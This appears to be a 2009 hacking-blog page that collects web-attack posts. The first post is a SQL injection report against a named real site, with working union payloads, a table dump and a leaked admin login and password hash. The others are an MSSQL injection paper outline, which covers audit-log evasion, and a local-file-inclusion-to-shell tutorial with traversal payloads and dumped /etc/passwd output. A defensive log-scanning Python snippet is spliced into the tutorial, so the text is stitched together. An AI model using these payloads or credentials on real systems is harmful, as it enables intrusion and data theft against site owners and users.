Published on 18/09/2009 12:09:00 in Hacking Web.
---------------------------------------------------------------
Network Information Center Of Guadalupe
LINK:http://www.nic.gp/
--------------------------------------------------------------
Server Software: Apache/2.2.3(Debian) PHP/5.2.0-8+etch11
DataBase Version: 5.0.32-Debian_7etch6-log
Current User: www2@localhost
Current Database: db2
Supports Union: YES
Union Columns: 4
URL:
http://www.nic.gp/news/newsReader.php?id=62
VULN:
http://www.nic.gp/news/newsReader.php?id=62+and+1=0+Union+Select+1,2,3,4
Comment: --
Visible Column: 2,3,4
--------------------------
Database Information
--------------------------
information_schema
db2
-------------------------
Tables
-------------------------
Gate_MO
Gate_MT
Gate_MT_Status
alternative_name
contacts
countries
currencies
customer_type
domaines
domaines_corrupted
duration
extensions
forbidden_words
named
news
news_fr
news_us
pricing_zone
princing
pub
pub_statut
sessions
subdomain
webrequest
whoisrequest
wusers
------------------------
Columns: Table+wusers
------------------------
id
login
pass
------------------------
Concat: Table+Wusers
-------------------------
http://www.nic.gp/news/newsReader.php?id=-62+Union+Select+1,2,concat_ws(0x3a,id,login,pass),4+from+wusers--
Result: 1:pr:1d7f2cc41d686ece
*EOF*
Published on 16/09/2009 12:09:00 in Hacking Web. Total votes: 11
##########
Contents
##########
[0x00] - Introduction
[0x01] - Know the Basic of SQL injection
[0x01a] - Introduction to SQL Injection Attack
[0x01b] - How to Test sites that are Vulnerable in SQL Injection
[0x01c] - Bypass Authentication with SQL Injection
[0x01d] - Audit Log Evasion
[0x01e] - (Perl Script) SQL-Google searching vulnerable sites
[0x02] - MSSQL Normal SQL Injection Attack
[0x02a] - ODBC Error Message Attack with "HAVING" and "GROUP BY"
[0x02b] - ODBC Error Message Attack with "CONVERT"
[0x02c] - MSSQL Injection with UNION Attack
[0x02d] - MSSQL Injection in Web Services (SOAP Injection)
[0x03] - MSSQL Blind SQL Injection Attack
[0x03a] - How to Test sites that are Vulnerable in Blind SQL Injection
[0x03b] - Determine data through Blind SQL Injection
[0x03c] - Exploit Query for get Table name
[0x03d] - Exploit Query for get Column name
[0x04] - More Dangerous SQL Injection Attack
[0x04a] - Dangerous from Extended Stored Procedures
[0x04b] - Advanced SQL Injection Techniques
[0x04c] - Mass MSSQL Injection Worms
[0x05] - MSSQL Injection Cheat Sheet
[0x06] - SQL Injection Countermeasures
[0x07] - References
[0x08] - Greetz To
LINK: http://milw0rm.com/papers/279
Published on 02/09/2009 12:09:00 in Hacking Web. Total votes: 16
>>>>>>>>>>>>>>> Shell via LFI - proc/self/environ method <<<<<<<<<<<<<<<
>>>>>>>>>>>>>>> Author : SirGod <<<<<<<<<<<<<<<
>>>>>>>>>>>>>>> www.insecurity-ro.org <<<<<<<<<<<<<<<
>>>>>>>>>>>>>>> www.h4cky0u.org <<<<<<<<<<<<<<<
>>>>>>>>>>>>>>> sirgod08@gmail.com <<<<<<<<<<<<<<<
1 - Introduction
2 - Finding LFI
3 - Checking if proc/self/environ is accessible
4 - Injecting malicious code
5 - Access our shell
6 - Shoutz
>> 1 - Introduction
In this tutorial I show you how to get a shell on websites using Local File Inclusion vulnerabilities and
injecting malicious code in proc/self/environ. It is a step by step tutorial.
>> 2 - Finding LFI
- Now we are going to find a Local File Inclusion vulnerable website. So we found our target, let's check it.
www.website.com/view.php?page=contact.php
- Now let's replace contact.php with ../ so the URL will become
www.website.com/view.php?page=../
and we got an error
Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337
big chances to have a Local File Inclusion vulnerability. Let's go to the next step.
- Now let's check for etc/passwd to see if it is Local File Inclusion vulnerable. Let's make a request:
www.website.com/view.php?page=../../../etc/passwd
we got error and no etc/passwd file
Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337
so we go more directories up
www.website.com/view.php?page=../../../../../etc/passwd
we successfully included the etc/passwd file.
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
test:x:13:30:test:/var/test:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nolo...
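A defender's view of the probing sequence above, as an added example that is not part of SirGod's tutorial: a Python scan of web access logs that decodes each query parameter, counts whole `..` path segments, and flags clients whose traversal depth grows request by request. The log lines, addresses and function names are constructed for illustration and assume combined-log-format entries.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed access-log lines (not from the original post); addresses are
# documentation ranges. Requests mirror the probing sequence in the tutorial.
SAMPLE_LOG = """\
203.0.113.7 - - [02/Sep/2009:12:00:01 +0000] "GET /view.php?page=contact.php HTTP/1.1" 200 512
203.0.113.7 - - [02/Sep/2009:12:00:09 +0000] "GET /view.php?page=../ HTTP/1.1" 200 310
203.0.113.7 - - [02/Sep/2009:12:00:15 +0000] "GET /view.php?page=../../../etc/passwd HTTP/1.1" 200 310
203.0.113.7 - - [02/Sep/2009:12:00:21 +0000] "GET /view.php?page=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1804
198.51.100.4 - - [02/Sep/2009:12:01:00 +0000] "GET /view.php?page=..%252f..%252fproc%252fself%252fenviron HTTP/1.1" 200 950
198.51.100.9 - - [02/Sep/2009:12:02:00 +0000] "GET /docs/a..b.html?page=about.php HTTP/1.1" 200 700
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" \d{3} ')
SENSITIVE = ("etc/passwd", "proc/self/environ")

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding such as %252f, with a bounded number of rounds."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan(log_text):
    """Return (client, param, depth, sensitive_target) for each traversal-style request."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        for name, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            value = fully_decode(raw).replace("\\", "/").lower()
            depth = value.split("/").count("..")  # only whole ".." path segments
            hit = next((s for s in SENSITIVE if s in value), None)
            if depth or hit:
                findings.append((client, name, depth, hit))
    return findings

def escalating_clients(findings):
    """Clients whose traversal depth grows across requests, as in step-by-step probing."""
    depths = defaultdict(list)
    for client, _name, depth, _hit in findings:
        depths[client].append(depth)
    return sorted(c for c, d in depths.items() if len(d) > 1 and d == sorted(d) and d[-1] > d[0])
```

Every probe in the sample returns HTTP 200 because PHP include() warnings do not change the status code, so the detection keys on the decoded parameter value rather than on the response status.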
Published on 25/08/2009 12:08:00 in Hacking Web.
Here is this practical guide to injections in MySQL databases... ;)
I hope you find it useful.
--------------------------------------------------------------------------------------
http://www.busindre.com/guia-rapida-de-inyecciones-en-bases-de-datos-mysql/